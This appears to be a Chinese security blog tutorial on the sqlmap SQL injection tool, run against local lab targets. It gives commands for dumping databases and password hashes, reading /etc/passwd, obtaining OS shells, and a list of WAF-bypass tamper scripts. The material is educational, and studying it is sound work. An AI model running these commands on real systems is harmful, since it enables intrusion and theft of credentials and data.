<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"sunian19.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="说实话本不打算写SQLmap的使用的，网上教程太多了，用烂了，都去用工具， 一到面试连个原理都不知道，仅供参考，多懂原理，少用工具，切记。">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;SQLmap的使用&#39;">
<meta property="og:url" content="https://sunian19.github.io/2019/12/07/SQLmap%E7%9A%84%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="zer0_c|imb&#39;s blog">
<meta property="og:description" content="说实话本不打算写SQLmap的使用的，网上教程太多了，用烂了，都去用工具， 一到面试连个原理都不知道，仅供参考，多懂原理，少用工具，切记。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunian19.github.io/imgss/t36.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t35.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t37.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t39.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t40.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t41.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t42.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t43.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t44.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t46.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t45.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t47.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t48.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t49.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t50.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t51.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t52.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t53.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t54.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t55.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t56.png">
<meta property="article:published_time" content="2019-12-07T12:33:12.000Z">
<meta property="article:modified_time" content="2020-04-06T06:04:16.000Z">
<meta property="article:author" content="zer0_c|imb">
<meta property="article:tag" content="工具">
<meta property="article:tag" content="SQL注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunian19.github.io/imgss/t36.png">


<link rel="canonical" href="https://sunian19.github.io/2019/12/07/SQLmap%E7%9A%84%E4%BD%BF%E7%94%A8/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://sunian19.github.io/2019/12/07/SQLmap%E7%9A%84%E4%BD%BF%E7%94%A8/","path":"2019/12/07/SQLmap的使用/","title":"'SQLmap的使用'"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>'SQLmap的使用' | zer0_c|imb's blog</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?48584c486973b4bf025a425c3d7b4007"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">zer0_c|imb's blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#jian-jie"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#an-zhuang-sq-lmap"><span class="nav-number">2.</span> <span class="nav-text">安装SQLmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ji-ben-shi-yong"><span class="nav-number">3.</span> <span class="nav-text">基本使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#jin-jie-ming-ling"><span class="nav-number">4.</span> <span class="nav-text">进阶命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#zi-dai-jiao-ben-tamper"><span class="nav-number">5.</span> <span class="nav-text">自带脚本tamper</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zer0_c|imb"
      src="/imgss/touxiang.jpg">
  <p class="site-author-name" itemprop="name">zer0_c|imb</p>
  <div class="site-description" itemprop="description">忘川河畔彼岸花，红如鲜血似朱砂</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">88</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">39</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:lingyu195@gmail.com" title="E-Mail → mailto:lingyu195@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=3504078815" title="QQ → tencent:&#x2F;&#x2F;AddContact&#x2F;?fromId&#x3D;45&amp;fromSubId&#x3D;1&amp;subcmd&#x3D;all&amp;uin&#x3D;3504078815" rel="noopener" target="_blank"><i class="qq fa-fw"></i>QQ</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.ch4ser.top/" title="http:&#x2F;&#x2F;www.ch4ser.top&#x2F;" rel="noopener" target="_blank">ch4ser</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://al0neranger.github.io/" title="https:&#x2F;&#x2F;al0neranger.github.io&#x2F;" rel="noopener" target="_blank">al0neranger</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/lyshark" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;lyshark" rel="noopener" target="_blank">lyshark</a>
        </li>
    </ul>
  </div>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunian19.github.io/2019/12/07/SQLmap%E7%9A%84%E4%BD%BF%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imgss/touxiang.jpg">
      <meta itemprop="name" content="zer0_c|imb">
      <meta itemprop="description" content="忘川河畔彼岸花，红如鲜血似朱砂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zer0_c|imb's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          'SQLmap的使用'
        </h1>


        <div class="post-meta">
        
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2019-12-07 20:33:12" itemprop="dateCreated datePublished" datetime="2019-12-07T20:33:12+08:00">2019-12-07</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-04-06 14:04:16" itemprop="dateModified" datetime="2020-04-06T14:04:16+08:00">2020-04-06</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/SQL%E6%B3%A8%E5%85%A5/" itemprop="url" rel="index"><span itemprop="name">SQL注入</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>

      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>说实话本不打算写SQLmap的使用的，网上教程太多了，用烂了，都去用工具，<br>
一到面试连个原理都不知道，仅供参考，多懂原理，少用工具，切记。</p>
<a id="more"></a>
<h3 id="jian-jie" id="简介">简介</h3>
<blockquote>
<p>SQLmap是一个自动化的SQL注入工具，主要功能是扫描、发现并利用给定URL的SQL注入漏洞，内置了很多绕过插件，支持MySQL、Oracle、postgreSQL、MSSQL(SQL Server)、ACCESS、DB2、SQLite、Firebird、sybase和SAP MaxDB数据库。SQLmap的强大功能包括数据库指纹识别、数据库枚举、数据提取、访问目标、文件系统、并在获取完全的操作权限时实行任意命令。</p>
</blockquote>
<h3 id="an-zhuang-sq-lmap" id="安装SQLmap">安装SQLmap</h3>
<blockquote>
<p>我们不用网上那种将SQLmap放到python的安装目录下。<br>
<a target="_blank" rel="noopener" href="https://github.com/sqlmapproject/sqlmap">https://github.com/sqlmapproject/sqlmap</a><br>
直接解压，创建一个名为alies_cmd.bat的别名脚本，右键编辑内容如下<br>
<img src="/imgss/t36.png" alt=""><br>
修改注册表，计算机\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Command Processor<br>
创建一个字符串名为AutoRun，值为刚才创建的bat脚本<br>
<img src="/imgss/t35.png" alt=""><br>
这样我们就能直接cmd调用sqlmap了<br>
<img src="/imgss/t37.png" alt=""></p>
</blockquote>
<h3 id="ji-ben-shi-yong" id="基本使用">基本使用</h3>
<p>1，判断是否存在注入点</p>
<blockquote>
<p>sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a><br>
<img src="/imgss/t39.png" alt=""><br>
id参数大于两个时，记得把url用双引号引起来<br>
sqlmap -u “<a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1&amp;uid=1">http://192.168.239.29/sqli-labs/Less-1/?id=1&amp;uid=1</a>”<br>
<img src="/imgss/t40.png" alt=""><br>
报出的代码中，需要关注的点<br>
第一处的意思为检测到数据库可能是MySQL，是否需要跳过检测其他数据库；第二处的意思是在“level1，risk1”的情况下，是否使用MySQL对应的所有payload进行检测；第三处的意思为参数ID存在漏洞，是否继续检测其他参数。<br>
<img src="/imgss/t41.png" alt=""><br>
检测结果，id处GET型注入，报错注入，延时注入，联合查询。</p>
</blockquote>
<p>2，判断文本中的请求是否存在注入</p>
<blockquote>
<p>MySQL可以从一个文本文件中获取HTTP请求，这样可以不设置其他参数(如cookie、POST数据等)，txt文件中的内容为Web数据包<br>
<img src="/imgss/t42.png" alt=""><br>
-p为指定其中一个参数<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.100.94/DVWA/vulnerabilities/sqli/?id=1&amp;submit=submit#">http://192.168.100.94/DVWA/vulnerabilities/sqli/?id=1&amp;submit=submit#</a> -p id<br>
-r一般在存在cookie注入时使用，注意*的优先级最高，测试时记得把其他*去掉<br>
<img src="/imgss/t43.png" alt=""></p>
</blockquote>
<p>3，查询数据</p>
<blockquote>
<p>(1)查询所有库名<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -dbs<br>
<img src="/imgss/t44.png" alt=""><br>
(2)查询库中的所有表名<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> -D security - -tables<br>
<img src="/imgss/t46.png" alt=""><br>
(3)查询表中的字段<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> -D security -T users - -columns<br>
<img src="/imgss/t45.png" alt=""><br>
(4)查询字段内容<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> -D security -T users -C username,password - -dump<br>
<img src="/imgss/t47.png" alt=""><br>
(5)脱裤<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -dump-all<br>
(6)获取数据库的所有用户<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -users<br>
<img src="/imgss/t48.png" alt=""><br>
(7)获取数据库用户的密码<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -passwords<br>
如果当前用户有读取包含用户密码的权限，SQLMAP会先列出用户，再列出hash，并尝试破解<br>
密码使用MySQL5加密，<a target="_blank" rel="noopener" href="http://xn--www-b03ej1m.cmd5.com">可在www.cmd5.com</a> 中自行解密。<br>
<img src="/imgss/t49.png" alt=""><br>
(8)获取当前网站数据库名称<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -current-db<br>
<img src="/imgss/t50.png" alt=""><br>
(9)获取当前网站数据库用户名称<br>
<img src="/imgss/t51.png" alt=""></p>
</blockquote>
<h3 id="jin-jie-ming-ling" id="进阶命令">进阶命令</h3>
<p>1，- -level 5：探测等级</p>
<blockquote>
<p>默认为1，等级越高包含的payload越多，在xml/payload.xml中可看到，也可根据相应的格式添加自己的payload，其中5级包含payload最多，会自动破解出cookie、XFF等头部注入。但相对运行速度也比较慢。<br>
这个参数会影响测试的注入点，GET和POST数据都会进行测试，HTTP cookie在level为2时就会测试，HTTP User-Agent/Referer头在level为3时进行测试。在不确定哪个payload或参数为注入点时，为了保证全面性，建议使用高的level值。</p>
</blockquote>
<p>2，- -is-dba：查询当前用户是否为管理员权限</p>
<blockquote>
<p>sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -is-dba<br>
<img src="/imgss/t52.png" alt=""></p>
</blockquote>
<p>3，- -roles：列出数据库管理员角色</p>
<blockquote>
<p>如果当前用户有权限读取包含所有用户的表，输入该命令会列举出每个用户的角色。<br>
<img src="/imgss/t53.png" alt=""></p>
</blockquote>
<p>4，- -referer：HTTP Referer头</p>
<blockquote>
<p>当- -level参数设定为3或以上时，会尝试对referer进行注入。可以使用此命令来欺骗，如- -referer <a target="_blank" rel="noopener" href="http://www.baidu.com">http://www.baidu.com</a></p>
</blockquote>
<p>5，- -sql-shell</p>
<blockquote>
<p>返回一个能够执行SQL语句的shell</p>
</blockquote>
<p>6，- -os-cmd，- -os-shell</p>
<blockquote>
<p>- -os-cmd   执行net user命令<br>
- -so-shell 获取一个交互式的shell执行操作系统命令<br>
原理(重点)：通过mysql的into outfile或into dumpfile功能，向网站目录写入php代码，用来执行系统命令。(需要数据库管理员权限，也就是- -is-dba的值为Ture)</p>
</blockquote>
<p>7，- -file-read：从数据库服务器中读取文件</p>
<blockquote>
<p>sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -file-read “/etc/passwd”<br>
<img src="/imgss/t54.png" alt=""></p>
</blockquote>
<p>8，- -file-write - -file-dest：上传本地文件到数据库服务器中</p>
<blockquote>
<p>写入write本地文件路径的文件，dest到目标的绝对路径，尽量把路径引起来<br>
sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.239.29/sqli-labs/Less-1/?id=1">http://192.168.239.29/sqli-labs/Less-1/?id=1</a> - -file-write “C:\Users\35040\Desktop\1.txt” - -file-dest “/tmp/1.txt”<br>
<img src="/imgss/t55.png" alt=""><br>
<img src="/imgss/t56.png" alt=""></p>
</blockquote>
<p>9，其他常用命令</p>
<blockquote>
<p>- -prefix    ‘%df%27’      指定前缀<br>
- -suffix    ‘- - l’        指定后缀<br>
sqlmap - -purge          清除所有缓存<br>
- -technique   B           注入测试时，指定布尔盲注<br>
- -threads    5            多线程检索<br>
- -identify-waf - -batch 检测waf<br>
直接连接到数据库<br>
-d “mysql://admin:admin@192.168.1.1:3306/testdb” - -dbs<br>
指定cookie注入<br>
- -cookie “security=low;PHPSESSID=28albj29q9588v7utjoo4”</p>
</blockquote>
<h3 id="zi-dai-jiao-ben-tamper" id="自带脚本tamper">自带脚本tamper</h3>
<p>格式： sqlmap -u <a target="_blank" rel="noopener" href="http://url">http://url</a> - -tamper 模块名</p>
<blockquote>
<p>速查表：<br>
1，<a target="_blank" rel="noopener" href="http://apostrophemask.py">apostrophemask.py</a><br>
作用：将引号替换为UTF-8，用于过滤单引号<br>
2，<a target="_blank" rel="noopener" href="http://base64encode.py">base64encode.py</a><br>
作用：替换为 base64编码<br>
3，<a target="_blank" rel="noopener" href="http://multipleaspace.py">multipleaspace.py</a><br>
作用：围绕 SQL 关键字添加多个空格<br>
4，<a target="_blank" rel="noopener" href="http://space2plus.py">space2plus.py</a><br>
作用：用+号替换空格<br>
5，<a target="_blank" rel="noopener" href="http://nonrecurisvereplacement.py">nonrecurisvereplacement.py</a><br>
作用：作为双重查询语句，用双重语句替代预定义SQL关键字(适用于非常弱的自定义过滤器，例如将SELECT替换为空)<br>
6，<a target="_blank" rel="noopener" href="http://space2randomblank.py">space2randomblank.py</a><br>
作用：将空格替换为其他有效字符<br>
7，<a target="_blank" rel="noopener" href="http://unionalltounion.py">unionalltounion.py</a><br>
作用：将 union all select替换为union select<br>
8，<a target="_blank" rel="noopener" href="http://securesphere.py">securesphere.py</a><br>
作用：追加特制字符串<br>
使用前：1 and 1=1<br>
使用后：1 and 1=1 and ‘0having=0having’<br>
9，<a target="_blank" rel="noopener" href="http://space2hash.py">space2hash.py</a><br>
作用：将空格替换为#号，并添加一个随机字符串和换行符<br>
10，<a target="_blank" rel="noopener" href="http://space2mssqlblank.py">space2mssqlblank.py</a>(mssql)<br>
作用：将空格替换为其他空符号<br>
11，<a target="_blank" rel="noopener" href="http://space2mssqlhash.py">space2mssqlhash.py</a><br>
作用：将空格替换为#号，并添加一个换行符<br>
12，<a target="_blank" rel="noopener" href="http://between.py">between.py</a><br>
作用：用not between 0 and 替换大于号（&gt;）,用between and替换等号（=）<br>
13，<a target="_blank" rel="noopener" href="http://percentage.py">percentage.py</a><br>
作用：ASP 允许在每个字符前面添加一个%号<br>
14，sp_password.py<br>
作用：从DBMS日志的自动模糊处理的有效载荷中追加sp_password<br>
15，<a target="_blank" rel="noopener" href="http://charencode.py">charencode.py</a><br>
作用：对给定的payload全部字符使用url编码（不处理已经编码的字符串）<br>
16，<a target="_blank" rel="noopener" href="http://randomcase.py">randomcase.py</a><br>
作用：随机大小写<br>
17，<a target="_blank" rel="noopener" href="http://charunicodeencode.py">charunicodeencode.py</a><br>
作用：字符串Unicode编码<br>
18，<a target="_blank" rel="noopener" href="http://space2comment.py">space2comment.py</a><br>
作用：将空格替换为/**/<br>
19，<a target="_blank" rel="noopener" href="http://equaltolike.py">equaltolike.py</a><br>
作用：将等号替换为like<br>
20，<a target="_blank" rel="noopener" href="http://greatest.py">greatest.py</a><br>
作用：绕过对&gt;号的过滤，用greatest替换&gt;号<br>
21，<a target="_blank" rel="noopener" href="http://ifnull2ifisnull.py">ifnull2ifisnull.py</a><br>
作用：绕过对ifnull的过滤，替换类似ifnull(a,b)为if(isnull(a),b,a)<br>
22，<a target="_blank" rel="noopener" href="http://modsecurityversioned.py">modsecurityversioned.py</a><br>
作用：过滤空格，使用mysql内联注释的方式进行注入<br>
23，<a target="_blank" rel="noopener" href="http://space2mysqlblank.py">space2mysqlblank.py</a><br>
作用：将空格替换为其他空白符号（mysql）<br>
24，<a target="_blank" rel="noopener" href="http://modsecurityzeroversioned.py">modsecurityzeroversioned.py</a><br>
作用：使用mysql内联注释的方式进行注入(/*！00000*/)（mysql5.0）<br>
25，<a target="_blank" rel="noopener" href="http://space2mysqldash.py">space2mysqldash.py</a><br>
作用：将空格替换为- -,并添加一个换行符<br>
26，<a target="_blank" rel="noopener" href="http://bluecoat.py">bluecoat.py</a><br>
作用：sql语句之后用有效的随机空白符替换空格符，随后用like替换=号<br>
27，<a target="_blank" rel="noopener" href="http://versionedkeywords.py">versionedkeywords.py</a><br>
作用：注释绕过<br>
28，<a target="_blank" rel="noopener" href="http://halfversionedmorekeywords.py">halfversionedmorekeywords.py</a><br>
作用：当数据库为mysql时绕过防火墙，再每个关键字之前添加mysql版本注释<br>
29，<a target="_blank" rel="noopener" href="http://space2morehash.py">space2morehash.py</a><br>
作用：将空格替换为#号，并添加一个随机字符串和换行符<br>
30，<a target="_blank" rel="noopener" href="http://apostrophenullencode.py">apostrophenullencode.py</a><br>
作用：用非法双字节Unicode字符替换单引号<br>
31，<a target="_blank" rel="noopener" href="http://appendnullbyte.py">appendnullbyte.py</a><br>
作用：在有效负荷的结束为止加载零字节字符编码<br>
32，<a target="_blank" rel="noopener" href="http://chardoubleencode.py">chardoubleencode.py</a><br>
作用：对给定的payload全部字符使用双重url编码（不处理已经编码的字符）<br>
33，<a target="_blank" rel="noopener" href="http://unmagicquotes.py">unmagicquotes.py</a><br>
作用：用一个多字节组合（%bf%27）和末尾通用注释一起替换空格<br>
34，<a target="_blank" rel="noopener" href="http://randomcomments.py">randomcomments.py</a><br>
作用：用/**/分割sql关键字</p>
</blockquote>
<p>希望大家在学习如何使用自带的tamper的同时，能够掌握tamper的编写规则，才能在各种实战环境中应对自如。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%B7%A5%E5%85%B7/" rel="tag"># 工具</a>
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2019/12/06/MsSQL%E5%8F%8Aaccess%E6%B3%A8%E5%85%A5/" rel="prev" title="'其他类型数据库注入'">
                  <i class="fa fa-chevron-left"></i> '其他类型数据库注入'
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2019/12/07/oracle%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5/" rel="next" title="'oracle数据库注入'">
                  'oracle数据库注入' <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zer0_c|imb</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
